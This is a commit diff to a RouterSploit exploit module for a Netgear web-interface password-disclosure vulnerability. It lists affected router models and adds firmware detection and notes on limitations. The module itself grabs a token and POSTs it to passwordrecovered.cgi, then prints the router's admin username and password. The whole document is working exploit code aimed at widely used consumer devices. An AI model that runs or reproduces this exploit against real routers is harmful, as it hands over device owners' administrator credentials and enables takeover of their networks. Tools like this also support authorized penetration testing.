add limitations infos in exploit metadata

add firmware version detection

routersploit/modules/exploits/netgear/multi_password_disclosure-201701.py

@@ -29,26 +29,30 @@ class Exploit(exploits.Exploit):
             'http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability'
         ],
         'devices': [
-            'R8500',
-            'R8300',
-            'R7000',
-            'R6400',
-            'R7300DST',
-            'R7100LG',
-            'R6300v2',
-            'WNDR3400v3',
-            'WNR3500Lv2',
+            'D6220',
+            'D6400',
+            'R6200v2',
             'R6250',
+            'R6300v2',
+            'R6400',
             'R6700',
             'R6900',
-            'R8000',
+            'R7000',
+            'R7100LG',
+            'R7300DST',
             'R7900',
-            'WNDR4500v2',
-            'R6200v2',
+            'R8000',
+            'R8300',
+            'R8500',
             'WNDR3400v2',
-            'D6220',
-            'D6400',
+            'WNDR3400v3',
+            'WNR3500Lv2',
+            'WNDR4500v2',
         ],
+        'limitations': [
+            "This exploit only works if 'password recovery' in router settings is OFF.",
+            "If the exploit has already been run, then it might not work anymore until device reboot."
+        ]
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
@@ -62,15 +66,27 @@ class Exploit(exploits.Exploit):
             response = http_request(method="GET", url=url)
 
             if response is not None:
+                # Detect model
                 model = response.headers.get('WWW-Authenticate')[13:-1]
-                print_status("Detected Netgear model: {}".format(model))
 
+                # Grab token if exists
                 token = self.extract_token(response.text)
                 if token is False:
                     token = "routersploit"
+                    print_status("Token not found")
                 else:
                     print_status("Token found: {}".format(token))
 
+                # Detect firmware version
+                url = "{}:{}/currentsetting.htm".format(self.target, self.port)
+                response = http_request(method="GET", url=url)
+                fw_version = ""
+                if response is not None and response.status_code == 200:
+                    fw_version = self.scrape(response.text, 'Firmware=', 'RegionTag').strip('\r\n')
+
+                print_status("Detected model: {} (FW: {})".format(model, fw_version))
+
+                # Exploit vulnerability
                 url = "{}:{}/passwordrecovered.cgi?id={}".format(self.target, self.port, token)
                 response = http_request(method="POST", url=url)
 
@@ -78,7 +94,7 @@ class Exploit(exploits.Exploit):
                     username, password = self.extract_password(response.text)
                     print_success('Exploit success! login: {}, password: {}'.format(username, password))
                 else:
-                    print_error("Exploit failed. Could not extract credentials.")
+                    print_error("Exploit failed. Could not extract credentials. Reboot your device and try again.")
             else:
                 print_error("Exploit failed. Could not extract credentials.")
         else:
@@ -117,7 +133,6 @@ class Exploit(exploits.Exploit):
 
         if response is not None:
             header = response.headers.get('WWW-Authenticate')
-            if header is not None and 'NETGEAR' in header.upper():
-                return True  # target is vulnerable
+            return header is not None and 'NETGEAR' in header.upper()  # target is vulnerable
 
         return False  # target is not vulnerable